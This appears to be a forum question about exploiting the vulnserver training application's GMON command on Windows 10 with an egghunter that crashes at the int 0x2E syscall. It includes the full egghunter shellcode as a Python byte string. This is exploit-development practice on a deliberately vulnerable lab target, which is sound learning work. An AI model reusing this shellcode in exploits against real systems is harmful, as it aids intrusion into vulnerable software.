While trying to exploit vulnserver (GMON), on Windows 10, using an egghunter, the program crashes in the instruction int 0x2E of the egghunter.The exploit works if I use jumps.
Does someone know if there is any issue or protection with the int 0x2E and int 0x80 instructions on Windows 10?
Egghunter code:
egghunter = ""egghunter += "\x66\x81\xCA\xFF\x0F" # or dx, 0x0fffegghunter += "\x42" # inc edxegghunter += "\x52" # push edxegghunter += "\x6A\x02" # push 0x2egghunter += "\x58" # pop eaxegghunter += "\xCD\x2E" # int 0x2eegghunter += "\x3C\x05" # cmp al, 0x5egghunter += "\x5A" # pop edxegghunter += "\x74\xEF" # jz 0x0egghunter += "\xB8\x6e\x6f\x70\x65" # mov eax, 0x6e6f7065egghunter += "\x8B\xFA" # mov edi,edxegghunter += "\xAF" # scasdegghunter += "\x75\xEA" # jnz 0x5egghunter += "\xAF" # scasdegghunter += "\x75\xE7" # jnz 0x5egghunter += "\xFF\xE7" # jmp edi